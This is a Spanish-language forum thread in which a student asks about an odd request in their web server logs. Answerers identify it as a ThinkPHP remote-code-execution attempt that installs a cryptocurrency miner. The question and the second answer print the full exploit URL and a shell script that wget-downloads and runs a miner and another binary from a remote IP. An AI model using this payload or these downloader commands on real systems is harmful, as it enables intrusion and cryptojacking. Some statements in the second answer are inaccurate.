Solicitud GET extraña a mi aplicación web

0

Desarrollé una aplicación Django para un proyecto escolar y la alojé en una instancia de EC2 para probar y aprender el entorno.

Durante la inspección de los registros, encontré la siguiente solicitud GET,

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 200 9472

Esto parece extraño porque no uso PHP, supongo que alguien asumió que uso PHP, luego intentó descargar y ejecutar un script ex.sh desde 205.185.113.123 . El contenido de ese script es,

cd /tmp; wget http://205.185.113.123/mcoin; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=90; rm -rf RjsWs
cd /tmp; wget http://205.185.113.123/sefa.x86; chmod 777 sefa.x86; ./sefa.x86 xd
rm -rf ex.sh

Como no conozco mucho las aplicaciones web y la seguridad, tengo algunas preguntas,

  • ¿Esto es un ataque? Si es así, ¿cuál es el nombre de este ataque?
  • ¿Se puede adaptar este ataque para Django en lugar de PHP?
  • ¿Esto es normal para las aplicaciones web? ¿Siempre reciben este tipo de solicitudes?
  • Según enlace , la dirección IP está registrada para una compañía llamada FranTech Solutions. ¿Están relacionados con este ataque?
  • ¿Esto es ilegal? Si es así, ¿puedo emprender acciones legales?
pregunta Emre Sülün 25.12.2018 - 12:24
fuente

2 respuestas

2
  • Esto está intentando explotar un código remoto Vulnerabilidad de ejecución en ThinkPHP . Así que sí, alguien está intentando atacar.
  • Sí, aunque esta específica es específica para ThinkPHP, también hay vulnerabilidades con regularidad para Django
  • Sí, esto es muy común para las aplicaciones web. Este no es el único tipo de solicitud de ataque y un atacante exitoso podría cambiar el archivo de registro para que no note que hubo un ataque. En mi opinión, una aplicación web alojada públicamente que procesa información no pública (esto también incluye nombres de usuario / contraseñas para el inicio de sesión) no se debe hacer para un proyecto escolar, al menos sin consultoría profesional debido a los riesgos como datos robados. Incluso con solo la información disponible públicamente, puede causar daños como costos de costos de computación, como cuando el atacante la usa como criptógrafo (como en su caso) y logra aumentar más las instancias.
  • FranTech Solutions parece alquilar servidores. Entonces, podría ser FranTech Solutions, podría ser un cliente de FranTech Solutions o podría ser alguien pirateado un cliente de FranTech Solutions.
  • Si es ilegal o no depende de la jurística. Pero por lo general, la policía no estará interesada en intentos sin daños significativos. Puede enviar una queja a FranTech Solutions y, si reciben suficientes quejas, podrían o no cerrar el servidor o el cliente, o podrían simplemente informar al cliente del servidor de que el servidor pudo haber sido pirateado y el cliente podría o podría no hacerlo. no arreglar el servidor.

Normalmente, los webmasters ignorarán estas entradas de registro después de asegurarse de que no sean vulnerables porque es muy común, especialmente si el sitio web tiene más de 100 usuarios.

    
respondido por el H. Idden 25.12.2018 - 13:38
fuente
0

Sí, esta vulnerabilidad es básicamente una carga de shell. En qué atacante carga el archivo y ese archivo interactúa directamente con su servidor para ejecutar los comandos del sistema de forma remota.

Ya descargué ese archivo desde tu enlace que se ve así

cd /tmp; wget http://205.185.113.123/mcoin; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=90; rm -rf RjsWs
cd /tmp; wget http://205.185.113.123/sefa.x86; chmod 777 sefa.x86; ./sefa.x86 xd
rm -rf ex.sh

Básicamente, ese archivo descarga 2 archivos más que son mcoin y sefa.x86 también es necesario buscar esos 2 archivos. Esos dos archivos están precompilados, por lo que es muy difícil decir lo que realmente Eso le hace a su servidor. Pero según mi estudio, esos archivos son mineros de cripto-moneda.

enlace

Respuestas: 1) ¿Es esto un ataque? Si es así, ¿ese es el nombre de este ataque?

Sí, Shell Upload

2) ¿Se puede adaptar este ataque para Django en lugar de PHP?

Si realmente quiere saber que el ataque se ejecuta con éxito, debe buscar en el directorio de su servidor web y encontrar el nombre del archivo ex.sh mcoin sefa. x86

3) ¿Esto es normal para las aplicaciones web? ¿Siempre reciben ese tipo de peticiones? No,

4) ¿Es esto ilegal? Si es así, ¿puedo iniciar una acción legal?

sí, esto es ilegal, sí, puede iniciar una acción legal

    
respondido por el Zodiac070495 25.12.2018 - 14:01
fuente

Lea otras preguntas en las etiquetas